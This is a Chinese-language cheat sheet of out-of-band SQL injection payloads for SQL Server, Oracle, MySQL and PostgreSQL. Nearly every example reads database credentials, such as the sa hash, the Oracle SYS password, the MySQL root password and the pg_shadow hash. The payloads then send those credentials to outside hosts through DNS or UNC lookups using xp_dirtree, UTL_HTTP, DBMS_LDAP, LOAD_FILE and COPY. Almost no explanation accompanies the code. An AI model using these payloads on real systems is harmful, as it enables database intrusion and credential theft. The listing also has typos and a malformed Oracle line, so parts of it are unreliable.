支持的数据库类型
- SQL Server
- Mysql
- Oracl
- PostgresSQL
注入姿势
SQL Server
Example:
-
DECLARE
@host
varchar
(
1024
);
-
SELECT
@host
=(
SELECT TOP
1
-
master
.
dbo
.
fn_varbintohexstr
(
password_hash
)
-
FROM sys
.
sql_logins WHERE name
=
'sa'
)
-
+
'.s.livesina.com'
;
-
EXEC
(
'
master
..
xp_dirtree
-
"\\'+@host+'\foobar$"');
Oracle
Example1:
SELECT UTL_INADDR.GET_HOST_ADDRESS('test.y.s.livesina.com');
Example2:
SELECT UTL_HTTP.REQUEST('http://test.y.livesina.com/test') FROM DUAL;
Example3:
SELECT UTL_HTTP.REQUEST('http://test.y.livesina.com/test') FROM DUAL;
Example4:
SELECT HTTPURITYPE('http://test.y.livesina.com/test').GETCLOB() FROM DUAL;
Example5:
SELECT DBMS_LDAP.INIT(('test.s.livesina.com',80) FROM DUAL;
Example6:
SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.s.livesina.com',80) FROM DUAL;
Mysql
Exmaple:
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.s.livesina.com\\abc'));
SELECT * from test WHERE id=1 and 1=2 UNION SELECT 1,LOAD_FILE(CONCAT('\\\\',(select DATABASE()),'.mysql.ip.port.qlsmyg.ceye.io\\abc'));
SELECT * from test WHERE id=1 and 1=(SELECT LOAD_FILE(CONCAT('\\\\',(select VERSION()),'.mysql.ip.port.qlsmyg.ceye.io\\abc')));
PostgreSQL
Example:
DROP TABLE IF EXISTS table_output;CREATE TABLE table_output(content text);CREATE OR REPLACE FUNCTION temp_function()
RETURNS VOID AS $$
DECLARE exec_cmd TEXT;DECLARE query_result TEXT;BEGINSELECT INTO query_result (SELECT passwd
FROM pg_shadow WHERE usename='postgres');
exec_cmd := E'COPY table_output(content)
FROM E\'\\\\\\\\'||query_result||E'.s.livesina.com\\\\foobar.txt\'';
EXECUTE exec_cmd;END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
SELECT temp_function();